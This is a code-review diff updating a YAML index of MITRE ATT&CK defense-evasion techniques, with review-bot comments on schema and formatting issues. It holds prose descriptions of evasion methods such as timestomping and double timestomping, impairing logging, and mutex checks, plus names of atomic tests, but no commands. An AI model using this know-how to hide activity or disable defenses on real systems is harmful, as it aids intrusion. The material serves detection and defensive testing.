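Review bot: this hunk silently drops `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) from T1556.002 while bumping `x_mitre_version` from `'2.0'` to `'2.1'` and `x_mitre_attack_spec_version` to `3.2.0`, and adds `revoked: false` and `x_mitre_deprecated: false`. The removal is consistent with newer ATT&CK spec versions no longer carrying that field, but any index consumer or filter that keys on `x_mitre_permissions_required` (the same field is dropped for T1070.006 later in the patch) will now see it missing for refreshed techniques and present for the ones left in the older format, so check for code that assumes it is always there. Unrelated nit carried over unchanged in the context lines: the registry path in `x_mitre_detection` is split so that the closing `)` sits alone on the next line, which puts a newline inside the quoted path in the rendered text.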
@@ -4142,7 +4203,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -4168,7 +4228,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -4191,8 +4251,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
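Review bot: T1600.001 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here with nothing added in its place (no other hunk touches this object apart from the `modified` change above), so after the patch this technique has no `x_mitre_attack_spec_version` at all. The same happens to T1055.003 later in the patch. Compare with T1556.002, T1202 and T1070.006, which are fully refreshed to `3.2.0`; it looks like objects still in the old key order were not re-pulled from the newer bundle. Either refresh these too or keep their `x_mitre_attack_spec_version` so every technique carries one.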
@@ -4288,7 +4346,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests:
- name: Clear Bash history (rm)
@@ -4472,60 +4529,71 @@ defense-evasion:
elevation_required: true
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
@@ -4592,7 +4660,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests:
- name: Base64 decoding with Python
@@ -4891,17 +4958,20 @@ defense-evasion:
elevation_required: false
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
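Review bot: the block scalar indicator for the T1562 `description` changes from `|-` to `|+`. With `|+` the string keeps its trailing newline and any blank lines that follow the last paragraph, whereas every other description in this file uses `|-` (strip). If the change is an artifact of how the new bundle was dumped rather than a deliberate choice, `|-` should be kept so the description value does not end in newlines; this also matters for any code that compares or hashes descriptions across versions. The merged text itself reads fine (the two old paragraphs about logout/shutdown and event aggregation are combined into one, with the new UNC3886 citation and the two new contributors added).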
@@ -4910,15 +4980,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
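Review bot: the platform list for T1562 replaces `Office 365` with `Office Suite` and adds `Identity Provider` (with `x_mitre_version` going to `'1.6'`), and T1070.008 later in this patch makes the same `Office 365` / `Google Workspace` to `Office Suite` substitution. Because the per-platform index CSVs are keyed on these platform strings, make sure every index generated from the platform name is regenerated in the same change and that any hard-coded list of platform names (for example in a build script or a test that enumerates the index files) knows about the new names; otherwise techniques tagged `Office Suite` or `Identity Provider` fall out of the platform indexes without an error.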
@@ -4956,15 +5028,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests:
- name: Disable journal logging via systemctl utility
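Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a leading space inside its `description` value (`" Punsaen Boonyakarn, ..."`), which is why this entry is double-quoted while the neighbouring `Emotet shutdown` entry is not. The stray space is carried into the rendered citation; trim it (upstream or in the generator) so the description starts with the author name. The move of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` out of this position is just the key reorder already applied to the other refreshed objects.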
@@ -5024,7 +5098,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -5072,13 +5146,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -5094,7 +5166,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -5119,6 +5191,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -5136,8 +5209,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -5150,12 +5223,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -5192,9 +5264,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
@@ -5232,9 +5303,8 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests:
- name: Copy and Delete Mailbox Data on Linux
@@ -5301,7 +5371,7 @@ defense-evasion:
elevation_required: true
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -5404,12 +5474,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -5493,7 +5562,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -5560,60 +5628,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests:
- name: Set a file's access timestamp
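Review bot: in the new T1070.006 description the added paragraphs are separated by blank lines, but there is no blank line between the last added paragraph (ending `...by modifying times on both attributes simultaneously.(Citation: Double Timestomping)`) and the unchanged line `Timestomping may be used along with file name [Masquerading]...`, so those two sentences will render as one paragraph while the rest are split. Add the blank line to match. Two smaller items: the `Double Timestomping` reference description ends in a double period (`Stay sharp out there..`), and `x_mitre_permissions_required` (`root`, `SYSTEM`, `User`) is dropped here as it was for T1556.002, so the same consumer check applies. The citation keys used in the new text (`Inversecos Timestomping 2022`, `Magnet Forensics`, `Double Timestomping`, `WindowsIR Anti-Forensic Techniques`) all resolve to entries in `external_references`, and the added `Process: OS API Execution` and `Command: Command Execution` data sources line up with the `$SI` versus `$FN` detection discussion in the description.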
@@ -5832,9 +5917,76 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1620
atomic_tests: []
+ T1480.002:
+ technique:
+ modified: '2024-10-28T16:22:25.431Z'
+ name: Mutual Exclusion
+ description: |-
+ Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+ While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+ In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+ Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Manikantan Srinivasan, NEC Corporation India
+ - Pooja Natarajan, NEC Corporation India
+ - Nagahama Hiroki – NEC Corporation Japan
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: OS API Execution'
+ - 'File: File Creation'
+ type: attack-pattern
+ id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+ created: '2024-09-19T14:00:03.401Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1480/002
+ external_id: T1480.002
+ - source_name: Intezer RedXOR 2021
+ description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+ Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+ September 19, 2024.
+ url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+ - source_name: Sans Mutexes 2012
+ description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+ Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+ url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+ - source_name: ICS Mutexes 2015
+ description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+ to Evade Detection. Retrieved September 19, 2024.
+ url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+ - source_name: Microsoft Mutexes
+ description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+ 2024.
+ url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+ - source_name: Deep Instinct BPFDoor 2023
+ description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+ Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+ 19, 2024.
+ url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.011:
technique:
modified: '2023-11-06T20:14:51.609Z'
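Review bot: the new T1480.002 object lands with `x_mitre_detection: ''` and `atomic_tests: []`, so the only detection guidance this repo carries for it is the two data sources ('Process: OS API Execution', 'File: File Creation'); please confirm the empty detection string is verbatim from upstream rather than a field lost in generation, since the description itself names the observables (creation of a named system mutex on Windows, lock acquisition on a mutex file on Linux) that a detection note would normally point at. Separately, the third contributor entry separates name and organisation with an en dash ('Nagahama Hiroki – NEC Corporation Japan') where the two entries above use a comma; worth checking it was copied verbatim rather than mangled in transit.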
@@ -5898,57 +6050,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
- type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
